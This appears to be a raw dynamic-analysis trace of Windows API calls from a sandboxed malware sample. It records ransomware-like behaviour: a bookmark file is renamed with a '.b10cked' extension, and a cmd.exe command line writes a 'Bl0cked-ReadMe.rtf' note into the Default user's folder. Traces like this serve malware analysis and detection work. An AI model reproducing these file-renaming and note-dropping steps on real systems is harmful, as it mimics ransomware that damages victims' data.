[0215.564] SetErrorMode (uMode=0x0) returned 0x0 [0215.564] SetErrorMode (uMode=0x1) returned 0x0 [0215.564] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", nBufferLength=0x104, lpBuffer=0x1ef458, lpFilePart=0x1ef1f0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", lpFilePart=0x1ef1f0*="MSNBCN~1.URL") returned 0x2f [0215.564] SetErrorMode (uMode=0x0) returned 0x1 [0215.564] SetErrorMode (uMode=0x0) returned 0x0 [0215.564] SetErrorMode (uMode=0x1) returned 0x0 [0215.564] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", nBufferLength=0x104, lpBuffer=0x1ef660, lpFilePart=0x1ef1f0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", lpFilePart=0x1ef1f0*="MSNBC News.url.b10cked") returned 0x39 [0215.564] SetErrorMode (uMode=0x0) returned 0x1 [0215.564] SetLastError (dwErrCode=0x0) [0215.564] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url.b10cked")) returned 
0xffffffff [0215.564] GetLastError () returned 0x2 [0215.564] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", fInfoLevelId=0x1, lpFindFileData=0x1eeb6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb6c) returned 0x3a0eb0 [0215.564] FindNextFileW (in: hFindFile=0x3a0eb0, lpFindFileData=0x1eeb6c | out: lpFindFileData=0x1eeb6c) returned 0 [0215.565] GetLastError () returned 0x12 [0215.565] FindClose (in: hFindFile=0x3a0eb0 | out: hFindFile=0x3a0eb0) returned 1 [0215.565] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", fInfoLevelId=0x1, lpFindFileData=0x3b1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1c08) returned 0x3a0eb0 [0215.566] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", nBufferLength=0x104, lpBuffer=0x1eee04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", lpFilePart=0x0) returned 0x39 [0215.566] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url", nBufferLength=0x104, lpBuffer=0x1eee04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url", lpFilePart=0x0) returned 0x31 [0215.566] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url")) returned 0x20 [0215.566] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url.b10cked"), dwFlags=0x3) returned 1 [0215.566] FindClose (in: hFindFile=0x3a0eb0 | out: hFindFile=0x3a0eb0) returned 1 [0215.566] _vsnwprintf (in: 
_Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eedb8 | out: _Buffer=" 1") returned 9 [0215.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.566] GetFileType (hFile=0x7) returned 0x2 [0215.600] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.600] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eed44 | out: lpMode=0x1eed44) returned 1 [0215.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eed78 | out: lpConsoleScreenBufferInfo=0x1eed78) returned 1 [0215.600] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.600] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eedb8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.600] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eed9c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eed9c*=0x1a) returned 1 [0215.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.601] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.601] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.601] SetConsoleInputExeNameW () returned 0x1 [0215.601] GetConsoleOutputCP () returned 0x1b5 [0215.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.601] exit (_Code=0) Process: id = "541" image_name = "cmd.exe" filename 
= "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31858 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31859 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31860 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31861 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 31862 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31863 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31864 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" 
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31865 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31866 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 31867 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31998 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31999 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32000 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32001 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32002 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32003 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32004 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32005 start_va = 0x7f6f0000 end_va = 
0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32006 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32007 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32008 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32009 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32010 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32011 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32012 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 32013 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32014 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 
32015 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32016 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32017 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 32018 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32019 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 32020 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 32021 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 743 os_tid = 0xb74 [0215.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f96c | out: lpSystemTimeAsFileTime=0x18f96c*(dwLowDateTime=0xb55ea360, dwHighDateTime=0x1d440a9)) [0215.695] GetCurrentProcessId () returned 0xbbc [0215.695] GetCurrentThreadId () returned 0xb74 [0215.695] GetTickCount () returned 0x3c5dd [0215.695] QueryPerformanceCounter (in: lpPerformanceCount=0x18f964 | out: lpPerformanceCount=0x18f964*=27248427742) returned 1 [0215.696] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.696] __set_app_type (_Type=0x1) [0215.696] __p__fmode () returned 0x76b331f4 [0215.696] __p__commode () returned 0x76b331fc [0215.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.696] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) 
returned 0 [0215.696] GetCurrentThreadId () returned 0xb74 [0215.696] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb74) returned 0x38 [0215.696] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.696] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.696] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8fc | out: phkResult=0x18f8fc*=0x0) returned 0x2 [0215.696] VirtualQuery (in: lpAddress=0x18f933, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.696] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.697] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.697] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.697] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 
[0215.697] GetConsoleOutputCP () returned 0x1b5 [0215.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.697] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.697] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.697] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.697] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.698] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.698] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.698] GetEnvironmentStringsW () returned 0x200150* [0215.698] FreeEnvironmentStringsW (penv=0x200150) returned 1 [0215.698] GetEnvironmentStringsW () returned 0x200150* [0215.698] FreeEnvironmentStringsW (penv=0x200150) returned 1 [0215.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x78, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | 
out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegCloseKey (hKey=0x40) returned 0x0 [0215.698] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.698] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, 
lpcbData=0x18e870*=0x1000) returned 0x2 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0215.699] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x1000) returned 0x2 [0215.699] RegCloseKey (hKey=0x40) returned 0x0 [0215.699] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.699] srand (_Seed=0x5b8863b1) [0215.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"" [0215.699] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"" [0215.699] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2018b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.699] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.699] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.699] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.699] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.699] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.699] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.700] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.700] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.700] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.700] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.700] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.700] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.700] GetEnvironmentStringsW () returned 0x2022a0* [0215.700] FreeEnvironmentStringsW (penv=0x2022a0) returned 1 [0215.700] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.700] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.700] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.700] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.700] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.700] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.700] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.700] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.700] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0215.700] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f638 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.700] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f638, lpFilePart=0x18f634 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f634*="Desktop") returned 0x18 [0215.700] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.700] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x1fffe0 [0215.700] FindClose (in: hFindFile=0x1fffe0 | out: hFindFile=0x1fffe0) returned 1 [0215.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x1fffe0 [0215.701] FindClose (in: hFindFile=0x1fffe0 | out: hFindFile=0x1fffe0) returned 1 [0215.701] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x1fffe0 [0215.701] FindClose (in: hFindFile=0x1fffe0 | out: hFindFile=0x1fffe0) returned 1 [0215.701] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.701] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.701] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.701] GetEnvironmentStringsW () returned 0x202ac0* [0215.701] FreeEnvironmentStringsW (penv=0x202ac0) returned 1 [0215.701] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.702] GetConsoleOutputCP () returned 0x1b5 [0215.702] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0215.702] GetUserDefaultLCID () returned 0x409 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f778, cchData=128 | out: lpLCData="1") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.702] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 